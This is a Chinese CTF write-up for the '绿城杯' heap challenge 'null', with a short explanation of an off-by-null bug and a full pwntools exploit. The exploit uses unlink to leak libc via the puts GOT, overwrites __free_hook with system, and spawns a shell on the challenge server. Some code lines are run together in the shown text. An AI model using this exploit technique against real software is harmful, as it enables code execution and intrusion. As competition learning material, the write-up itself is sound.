绿城杯 null

绿城杯 null"/>

绿城杯 null

题目特征

增

删

改

查

思路

j8题不给libc恶心人，平时也没有用libcsearcher的习惯，这道题给了堆存储的数组，read_input这里有个洞off by null，多申请0x8然后可以覆盖pre_inuse位，那就用unlink来打，修改free_hook。

# -*- coding: utf-8 -*-
from pwn import *
elf=ELF('./1')
p=remote('82.157.5.28',51004)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context.log_level='debug'def alloc(idx,size,content):p.sendlineafter('Your choice :','1')p.sendlineafter('Index:',str(idx))p.sendlineafter('Size of Heap : ',str(size))p.sendlineafter('Content?:',str(content))def delete(index):  p.sendlineafter('Your choice :','2')  p.sendlineafter('Index:',str(index))  def edit(index,content):  p.sendlineafter('Your choice :','3')  p.sendlineafter('Index:',str(index))  p.sendafter('Content?:',content)  def show(index):p.sendlineafter('Your choice :','4')p.sendlineafter('Index :',str(index)) target = 0x602120alloc(0,0x48,'aaaa')
alloc(1,0x80,'bbbb')
alloc(2,0x80,'cccc')
payload = p64(0)+p64(0x41)
payload += p64(target-0x18)+p64(target-0x10)
payload += 'a' *0x20
payload += p64(0x40)+'\x90'
edit(0,payload)
delete(1)delete(1)
edit(0,0x18*'a'+p64(0x602120)+p64(0)+p64(elf.got['puts']))
show(2)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']
print hex(libc.address)
pause()
edit(0,p64(libc.sym['__free_hook']))
edit(0,p64(libc.sym['system']))
alloc(3,0x20,'/bin/sh\x00')
delete(3)
p.interactive()